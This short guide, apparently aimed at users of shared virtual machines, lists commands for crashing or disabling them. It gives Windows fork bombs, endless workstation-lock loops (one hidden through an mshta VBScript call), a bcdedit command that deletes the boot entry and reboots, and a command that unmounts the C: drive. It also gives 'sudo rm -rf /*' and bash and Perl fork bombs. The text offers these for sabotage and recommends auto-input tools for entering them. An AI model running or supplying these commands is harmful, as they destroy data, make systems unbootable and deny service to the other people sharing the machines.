To crash the VM, you must execute one of them in the "Run" window or in the command line (cmd). To do this, it is strongly recommended to use auto-input programs.
- Classic fork bomb. May be closed.
cmd /c echo %0^|%0>1.bat&1.bat
- Infinite blocking the windows user + pseudo fork bomb. Unclosable, only reboot helps.
cmd /k for /l %x in (1, 1, 9999999) do (start cmd /k rundll32 user32,LockWorkStation)
- Hidden infinite blocking the windows user (not a forkbomb). Unclosable, Perfect way to block VM, only reboot helps.
cmd /c mshta vbscript:(CreateObject("WScript.Shell").Run("cmd /k for /l %x in (1, 1, 999999) do rundll32 user32,LockWorkStation """,0))(Window.Close)
- Delete windows from bootloader and reboot (the system will no longer be able to boot. Run from cmd started as admin (RMB on cmd -> Run as admin).
cmd /k bcdedit /delete {current}&wmic os primary=1 reboot
- Unmount primary C:\ drive. If you execute this command as admin, users cant interact with VM anymore.
mountvol c: /d
You must run "Terminal" program and execute command there.
- Needs no introduction
sudo rm -rf /*
- Bash fork bomb. May not work due to fork restrictions.
:(){ :|:& };:
- Perl fork bomb. May not work due to fork restrictions.
perl -e "fork while fork" &